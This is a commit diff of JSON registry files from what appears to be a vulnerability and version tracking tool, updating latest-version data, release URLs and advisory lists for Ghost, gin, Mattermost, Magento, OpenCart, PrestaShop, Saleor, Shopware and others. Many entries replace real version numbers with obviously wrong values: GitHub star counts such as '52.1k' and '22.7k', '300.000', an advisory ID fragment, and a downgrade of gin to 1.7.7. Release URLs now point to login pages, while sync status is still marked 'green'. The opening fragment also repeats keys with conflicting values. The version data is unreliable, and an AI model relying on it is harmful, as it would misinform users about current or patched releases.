"marketplace_url": "",
"latest_version": "6.22.1",
"latest_version": "52.1k",
"version_scheme": "vendor",
"latest_release_at": "2026-03-20T15:25:05Z",
"latest_release_url": "https://github.com/TryGhost/Ghost/releases/tag/v6.22.1",
"latest_release_url": "https://github.com/login?return_to=%2FTryGhost%2FGhost",
"version_source_refs": [
"https://github.com/login?return_to=%2FTryGhost%2FGhost"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:57+00:00",
"latest_version_evidence": [
"Ghost GitHub Advisories"
],

11
08-threat-intel/registry/entities/gin--repo--github-com-gin-gonic-gin.json
查看文件

@@ -12,20 +12,21 @@
"repo_url": "https://github.com/gin-gonic/gin",
"package_registry": "",
"marketplace_url": "",
"latest_version": "1.12.0",
"latest_version": "1.7.7",
"version_scheme": "semver-ish",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_release_url": "https://github.com/gin-gonic/gin/releases/tag/v1.12.0",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"latest_release_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28483",
"version_source_refs": [
"https://github.com/gin-gonic/gin/releases/tag/v1.12.0",
"https://nvd.nist.gov/vuln/detail/CVE-2020-28483"
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://nvd.nist.gov/vuln/detail/CVE-2020-28483"
"https://nvd.nist.gov/vuln/detail/CVE-2020-28483",
"advisory-fixed-version"
],
"catalog_source": "",
"catalog_reason": "",

8
08-threat-intel/registry/entities/gin.json
查看文件

@@ -12,14 +12,14 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "1.12.0",
"latest_version": "1.7.7",
"version_scheme": "vendor",
"latest_release_at": "2026-02-28T10:12:25Z",
"latest_release_url": "https://github.com/gin-gonic/gin/releases/tag/v1.12.0",
"latest_release_at": "2026-03-14T10:41:18.820930Z",
"latest_release_url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28483",
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:58+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/gitea.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/gitlab-ce.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 614,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"GitLab Security Releases Atom"
],

2
08-threat-intel/registry/entities/grafana.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/hapi--package--hapi-hapi.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"npm latest",
"https://www.npmjs.com/advisories/1482"

2
08-threat-intel/registry/entities/hapi.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

14
08-threat-intel/registry/entities/haproxy.json
查看文件

@@ -17,11 +17,12 @@
"latest_release_at": "Mon, 16 Mar 2026 08:00:00 +0000",
"latest_release_url": "https://www.haproxy.com/blog/announcing-haproxy-fusion-2-0",
"version_source_refs": [
"https://www.haproxy.com/blog/announcing-haproxy-fusion-2-0"
"https://www.haproxy.com/blog/announcing-haproxy-fusion-2-0",
"https://www.haproxy.com/blog/announcing-haproxy-unified-gateway-1-0"
],
"version_sync_status": "green",
"security_version_count": 1,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"security_version_count": 2,
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"HAProxy Blog Feed"
],
@@ -33,17 +34,18 @@
"history_backfill_status": "seeded",
"latest_sync_status": "green",
"official_source_covered": true,
"advisory_count": 6,
"workflow_complete_advisory_count": 6,
"advisory_count": 7,
"workflow_complete_advisory_count": 7,
"version_mapped_advisory_count": 0,
"first_advisory_at": "2026-02-19T09:00:00+00:00",
"latest_advisory_at": "2026-03-16T08:00:00+00:00",
"latest_advisory_at": "2026-03-24T00:00:00+00:00",
"advisory_ids": [
"haproxy--0b253e2576",
"haproxy--10754c864c",
"haproxy--3164dd5e31",
"haproxy--9149e77a37",
"haproxy--c60ee42162",
"haproxy--ecfe8a1346",
"haproxy--f1c3251635"
],
"source_refs": [

2
08-threat-intel/registry/entities/jenkins.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/joomla.json
查看文件

@@ -25,7 +25,7 @@
],
"version_sync_status": "green",
"security_version_count": 5,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"Joomla Security Centre"
],

2
08-threat-intel/registry/entities/kibana.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/koa--project--koa.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/koajs/koa/security/advisories/GHSA-7gcc-r8m5-44qm"

2
08-threat-intel/registry/entities/koa.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 4,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/laravel--package--laravel-framework.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 103,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"Packagist p2",
"https://github.com/laravel/framework/security/advisories/GHSA-66hf-2p6w-jqfw"

2
08-threat-intel/registry/entities/laravel.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 103,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

9
08-threat-intel/registry/entities/magento-open-source--repo--magento-magento2.json
查看文件

@@ -12,19 +12,20 @@
"repo_url": "https://github.com/magento/magento2",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-10T14:04:22Z",
"latest_release_url": "https://github.com/magento/magento2/releases/tag/2.4.9-beta1",
"latest_release_url": "https://sansec.io/research/visbot-malware-on-6691-stores-analysis",
"version_source_refs": [
"https://github.com/magento/magento2/releases/tag/2.4.9-beta1",
"https://sansec.io/research/vendors-defeat-magento-security-patch-simple-check",
"https://sansec.io/research/adminer-4.6.2-file-disclosure-vulnerability",
"https://sansec.io/research/magento-apsb25-08"
"https://sansec.io/research/magento-apsb25-08",
"https://sansec.io/research/visbot-malware-on-6691-stores-analysis"
],
"version_sync_status": "green",
"security_version_count": 3,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"Sansec Research"

6
08-threat-intel/registry/entities/magento-open-source.json
查看文件

@@ -12,10 +12,10 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "2.4.9-beta1",
"latest_version": "300.000",
"version_scheme": "vendor",
"latest_release_at": "2026-03-10T14:04:22Z",
"latest_release_url": "https://github.com/magento/magento2/releases/tag/2.4.9-beta1",
"latest_release_url": "https://sansec.io/research/visbot-malware-on-6691-stores-analysis",
"version_source_refs": [
"https://sansec.io/research/visbot-malware-on-6691-stores-analysis",
"https://sansec.io/research/vendors-defeat-magento-security-patch-simple-check",
@@ -24,7 +24,7 @@
],
"version_sync_status": "green",
"security_version_count": 3,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"Sansec Research"
],

2
08-threat-intel/registry/entities/mattermost--plugin--mattermost-plugins.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 759,
"last_version_synced_at": "2026-03-23T09:53:56+00:00",
"last_version_synced_at": "2026-03-24T09:18:00+00:00",
"latest_version_evidence": [
"Mattermost Security Updates JSON",
"https://securityupdates.mattermost.com/security_updates.json"

2
08-threat-intel/registry/entities/mattermost--project--issue-platform.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 756,
"last_version_synced_at": "2026-03-23T09:53:58+00:00",
"last_version_synced_at": "2026-03-24T09:18:00+00:00",
"latest_version_evidence": [
"Mattermost Security Updates JSON",
"https://securityupdates.mattermost.com/security_updates.json"

11
08-threat-intel/registry/entities/mattermost--project--mattermost-server.json
查看文件

@@ -20,8 +20,8 @@
"https://securityupdates.mattermost.com/security_updates.json"
],
"version_sync_status": "green",
"security_version_count": 765,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"security_version_count": 764,
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [
"Mattermost Security Updates JSON"
],
@@ -33,13 +33,12 @@
"history_backfill_status": "complete",
"latest_sync_status": "green",
"official_source_covered": true,
"advisory_count": 14,
"workflow_complete_advisory_count": 14,
"version_mapped_advisory_count": 14,
"advisory_count": 13,
"workflow_complete_advisory_count": 13,
"version_mapped_advisory_count": 13,
"first_advisory_at": "2026-02-23T00:00:00+00:00",
"latest_advisory_at": "2026-03-16T00:00:00+00:00",
"advisory_ids": [
"mattermost--CVE-2026-4265",
"mattermost--MMSA-2025-00562",
"mattermost--MMSA-2025-00566",
"mattermost--MMSA-2026-00574",

59
08-threat-intel/registry/entities/mattermost--repo--github-com-mattermost-mattermost-server.json
查看文件

@@ -12,22 +12,44 @@
"repo_url": "https://github.com/mattermost/mattermost-server",
"package_registry": "",
"marketplace_url": "",
"latest_version": "11.4.3",
"latest_version": "26.2.1",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-16T08:26:52Z",
"latest_release_url": "https://github.com/mattermost/mattermost/releases/tag/v11.4.3",
"latest_release_at": "2023-10-03",
"latest_release_url": "https://securityupdates.mattermost.com/security_updates.json",
"version_source_refs": [
"https://github.com/mattermost/mattermost/releases/tag/v11.4.3",
"https://nvd.nist.gov/vuln/detail/CVE-2026-22545",
"https://securityupdates.mattermost.com/security_updates.json"
"https://securityupdates.mattermost.com/security_updates.json",
"https://nvd.nist.gov/vuln/detail/CVE-2026-21386",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2463",
"https://nvd.nist.gov/vuln/detail/CVE-2026-24692",
"https://nvd.nist.gov/vuln/detail/CVE-2026-4265",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2458",
"https://nvd.nist.gov/vuln/detail/CVE-2026-26246",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2457",
"https://nvd.nist.gov/vuln/detail/CVE-2026-25780",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2578",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2455",
"https://nvd.nist.gov/vuln/detail/CVE-2026-24458"
],
"version_sync_status": "green",
"security_version_count": 761,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"security_version_count": 810,
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"https://nvd.nist.gov/vuln/detail/CVE-2026-22545",
"Mattermost Security Updates JSON"
"Mattermost Security Updates JSON",
"https://nvd.nist.gov/vuln/detail/CVE-2026-21386",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2463",
"https://nvd.nist.gov/vuln/detail/CVE-2026-24692",
"https://nvd.nist.gov/vuln/detail/CVE-2026-4265",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2458",
"https://nvd.nist.gov/vuln/detail/CVE-2026-26246",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2457",
"https://nvd.nist.gov/vuln/detail/CVE-2026-25780",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2578",
"https://nvd.nist.gov/vuln/detail/CVE-2026-2455",
"https://nvd.nist.gov/vuln/detail/CVE-2026-24458"
],
"catalog_source": "",
"catalog_reason": "",
@@ -37,13 +59,24 @@
"history_backfill_status": "seeded",
"latest_sync_status": "green",
"official_source_covered": true,
"advisory_count": 1,
"workflow_complete_advisory_count": 1,
"version_mapped_advisory_count": 1,
"first_advisory_at": "2026-03-16T15:30:47+00:00",
"latest_advisory_at": "2026-03-19T19:31:20+00:00",
"advisory_count": 12,
"workflow_complete_advisory_count": 12,
"version_mapped_advisory_count": 12,
"first_advisory_at": "2026-03-16T15:30:42+00:00",
"latest_advisory_at": "2026-03-23T18:56:23+00:00",
"advisory_ids": [
"mattermost--CVE-2026-22545"
"mattermost--CVE-2026-21386",
"mattermost--CVE-2026-22545",
"mattermost--CVE-2026-24458",
"mattermost--CVE-2026-2455",
"mattermost--CVE-2026-2457",
"mattermost--CVE-2026-2458",
"mattermost--CVE-2026-2463",
"mattermost--CVE-2026-24692",
"mattermost--CVE-2026-2578",
"mattermost--CVE-2026-25780",
"mattermost--CVE-2026-26246",
"mattermost--CVE-2026-4265"
],
"source_refs": []
}

22
08-threat-intel/registry/entities/mattermost.json
查看文件

@@ -20,8 +20,8 @@
"https://securityupdates.mattermost.com/security_updates.json"
],
"version_sync_status": "green",
"security_version_count": 3041,
"last_version_synced_at": "2026-03-23T09:53:55+00:00",
"security_version_count": 3089,
"last_version_synced_at": "2026-03-24T09:17:59+00:00",
"latest_version_evidence": [
"Mattermost Security Updates JSON"
],
@@ -33,13 +33,23 @@
"history_backfill_status": "complete",
"latest_sync_status": "green",
"official_source_covered": true,
"advisory_count": 21,
"workflow_complete_advisory_count": 21,
"version_mapped_advisory_count": 21,
"advisory_count": 31,
"workflow_complete_advisory_count": 31,
"version_mapped_advisory_count": 31,
"first_advisory_at": "2026-02-23T00:00:00+00:00",
"latest_advisory_at": "2026-03-19T19:31:20+00:00",
"latest_advisory_at": "2026-03-23T18:56:23+00:00",
"advisory_ids": [
"mattermost--CVE-2026-21386",
"mattermost--CVE-2026-22545",
"mattermost--CVE-2026-24458",
"mattermost--CVE-2026-2455",
"mattermost--CVE-2026-2457",
"mattermost--CVE-2026-2458",
"mattermost--CVE-2026-2463",
"mattermost--CVE-2026-24692",
"mattermost--CVE-2026-2578",
"mattermost--CVE-2026-25780",
"mattermost--CVE-2026-26246",
"mattermost--CVE-2026-4265",
"mattermost--Issue Identifier",
"mattermost--MMSA-2025-00562",

2
08-threat-intel/registry/entities/mediawiki.json
查看文件

@@ -28,7 +28,7 @@
],
"version_sync_status": "green",
"security_version_count": 254,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [
"MediaWiki Announce RSS"
],

2
08-threat-intel/registry/entities/medusa.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/moodle.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/nestjs.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/nextjs--project--next.json
查看文件

@@ -35,7 +35,7 @@
],
"version_sync_status": "green",
"security_version_count": 168,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/vercel/next.js",

2
08-threat-intel/registry/entities/nextjs.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 168,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/nginx.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/nodejs.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "source-gap",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/nuxt--project--nuxt.json
查看文件

@@ -26,7 +26,7 @@
],
"version_sync_status": "green",
"security_version_count": 11,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/nuxt/nuxt/security/advisories/GHSA-vf6r-87q4-2vjf",

2
08-threat-intel/registry/entities/nuxt.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 11,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

6
08-threat-intel/registry/entities/opencart--repo--opencart-opencart.json
查看文件

@@ -12,10 +12,10 @@
"repo_url": "https://github.com/opencart/opencart",
"package_registry": "",
"marketplace_url": "",
"latest_version": "3.0.5.0",
"latest_version": "8.1k",
"version_scheme": "semver-ish",
"latest_release_at": "2025-12-12T10:27:11Z",
"latest_release_url": "https://github.com/opencart/opencart/releases/tag/3.0.5.0",
"latest_release_url": "https://github.com/login?return_to=%2Fopencart%2Fopencart",
"version_source_refs": [
"https://github.com/opencart/opencart/releases/tag/3.0.5.0",
"https://github.com/opencart/opencart/tree/3.0.5.0",
@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:02+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"OpenCart Releases"

6
08-threat-intel/registry/entities/opencart.json
查看文件

@@ -12,17 +12,17 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "3.0.5.0",
"latest_version": "8.1k",
"version_scheme": "vendor",
"latest_release_at": "2025-12-12T10:27:11Z",
"latest_release_url": "https://github.com/opencart/opencart/releases/tag/3.0.5.0",
"latest_release_url": "https://github.com/login?return_to=%2Fopencart%2Fopencart",
"version_source_refs": [
"https://github.com/login?return_to=%2Fopencart%2Fopencart",
"https://github.com/opencart/opencart/tree/3.0.5.0"
],
"version_sync_status": "green",
"security_version_count": 2,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:01+00:00",
"latest_version_evidence": [
"OpenCart Releases"
],

2
08-threat-intel/registry/entities/openmage--repo--openmage-magento-lts.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:03+00:00",
"latest_version_evidence": [
"GitHub Releases API"
],

2
08-threat-intel/registry/entities/openmage.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:02+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/phpmyadmin.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:03+00:00",
"latest_version_evidence": [
"phpMyAdmin Security Page"
],

9
08-threat-intel/registry/entities/prestashop--repo--prestashop-prestashop.json
查看文件

@@ -12,21 +12,22 @@
"repo_url": "https://github.com/PrestaShop/PrestaShop",
"package_registry": "",
"marketplace_url": "",
"latest_version": "9.0.3",
"latest_version": "3366-9287-7qpr",
"version_scheme": "semver-ish",
"latest_release_at": "2026-02-03T10:01:48Z",
"latest_release_url": "https://github.com/PrestaShop/PrestaShop/releases/tag/9.0.3",
"latest_release_url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr",
"version_source_refs": [
"https://github.com/PrestaShop/PrestaShop/releases/tag/9.0.3",
"https://security.friendsofpresta.org/core/2025/09/04/CVE-2025-51586.html",
"https://security.friendsofpresta.org/modules/2025/05/22/appagebuilder.html",
"https://build.prestashop-project.org/news/2026/prestashop-8-2-4-maintenance-release/",
"https://security.friendsofpresta.org/modules/2026/02/16/advancedpopupcreator-cve-2025-69633.html",
"https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr"
"https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr",
"https://build.prestashop-project.org/news/2026/prestashop-8-2-5-maintenance-release/"
],
"version_sync_status": "green",
"security_version_count": 9,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [
"GitHub Releases API",
"Friends Of Presta Security",

9
08-threat-intel/registry/entities/prestashop.json
查看文件

@@ -12,20 +12,21 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "9.0.3",
"latest_version": "3366-9287-7qpr",
"version_scheme": "vendor",
"latest_release_at": "2026-02-03T10:01:48Z",
"latest_release_url": "https://github.com/PrestaShop/PrestaShop/releases/tag/9.0.3",
"latest_release_url": "https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr",
"version_source_refs": [
"https://github.com/PrestaShop/PrestaShop/security/advisories/GHSA-3366-9287-7qpr",
"https://security.friendsofpresta.org/core/2025/09/04/CVE-2025-51586.html",
"https://security.friendsofpresta.org/modules/2025/05/22/appagebuilder.html",
"https://build.prestashop-project.org/news/2026/prestashop-8-2-4-maintenance-release/",
"https://security.friendsofpresta.org/modules/2026/02/16/advancedpopupcreator-cve-2025-69633.html"
"https://security.friendsofpresta.org/modules/2026/02/16/advancedpopupcreator-cve-2025-69633.html",
"https://build.prestashop-project.org/news/2026/prestashop-8-2-5-maintenance-release/"
],
"version_sync_status": "green",
"security_version_count": 9,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:03+00:00",
"latest_version_evidence": [
"GitHub PrestaShop Advisories",
"Friends Of Presta Security",

2
08-threat-intel/registry/entities/rails--project--rails.json
查看文件

@@ -26,7 +26,7 @@
],
"version_sync_status": "green",
"security_version_count": 102,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [
"npm latest",
"https://nvd.nist.gov/vuln/detail/CVE-2007-5379",

2
08-threat-intel/registry/entities/rails.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 102,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/react--project--react-dom.json
查看文件

@@ -22,7 +22,7 @@
],
"version_sync_status": "green",
"security_version_count": 12,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [
"npm latest",
"https://nvd.nist.gov/vuln/detail/CVE-2018-6341"

2
08-threat-intel/registry/entities/react--project--react.json
查看文件

@@ -23,7 +23,7 @@
],
"version_sync_status": "green",
"security_version_count": 6,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [
"npm latest",
"https://github.com/facebook/react",

2
08-threat-intel/registry/entities/react.json
查看文件

@@ -19,7 +19,7 @@
"version_source_refs": [],
"version_sync_status": "green",
"security_version_count": 18,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [],
"catalog_source": "",
"catalog_reason": "",

2
08-threat-intel/registry/entities/redmine.json
查看文件

@@ -21,7 +21,7 @@
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [
"Redmine Security Advisories"
],

12
08-threat-intel/registry/entities/saleor--repo--saleor-saleor.json
查看文件

@@ -12,18 +12,20 @@
"repo_url": "https://github.com/saleor/saleor",
"package_registry": "",
"marketplace_url": "",
"latest_version": "3.22.43",
"latest_version": "22.7k",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-19T13:13:39Z",
"latest_release_url": "https://github.com/saleor/saleor/releases/tag/3.22.43",
"latest_release_url": "https://github.com/login?return_to=%2Fsaleor%2Fsaleor",
"version_source_refs": [
"https://github.com/saleor/saleor/releases/tag/3.22.43"
"https://github.com/saleor/saleor/releases/tag/3.22.43",
"https://github.com/login?return_to=%2Fsaleor%2Fsaleor"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:05+00:00",
"latest_version_evidence": [
"GitHub Releases API"
"GitHub Releases API",
"GitHub Saleor Advisories"
],
"catalog_source": "GitHub Saleor Advisories",
"catalog_reason": "source catalog exposed a stable security-related object and auto-catalog is enabled",

6
08-threat-intel/registry/entities/saleor.json
查看文件

@@ -12,16 +12,16 @@
"repo_url": "",
"package_registry": "",
"marketplace_url": "",
"latest_version": "3.22.43",
"latest_version": "22.7k",
"version_scheme": "vendor",
"latest_release_at": "2026-03-19T13:13:39Z",
"latest_release_url": "https://github.com/saleor/saleor/releases/tag/3.22.43",
"latest_release_url": "https://github.com/login?return_to=%2Fsaleor%2Fsaleor",
"version_source_refs": [
"https://github.com/login?return_to=%2Fsaleor%2Fsaleor"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
"last_version_synced_at": "2026-03-24T09:18:04+00:00",
"latest_version_evidence": [
"GitHub Saleor Advisories"
],

12
08-threat-intel/registry/entities/shopware--repo--shopware-shopware.json
查看文件

@@ -12,18 +12,20 @@
"repo_url": "https://github.com/shopware/shopware",
"package_registry": "",
"marketplace_url": "",
"latest_version": "6.7.8.2",
"latest_version": "3.3k",
"version_scheme": "semver-ish",
"latest_release_at": "2026-03-18T15:05:49Z",
"latest_release_url": "https://github.com/shopware/shopware/releases/tag/v6.7.8.2",
"latest_release_url": "https://github.com/login?return_to=%2Fshopware%2Fshopware",
"version_source_refs": [
"https://github.com/shopware/shopware/releases/tag/v6.7.8.2"
"https://github.com/shopware/shopware/releases/tag/v6.7.8.2",
"https://github.com/login?return_to=%2Fshopware%2Fshopware"
],
"version_sync_status": "green",
"security_version_count": 0,
"last_version_synced_at": "2026-03-23T09:53:59+00:00",
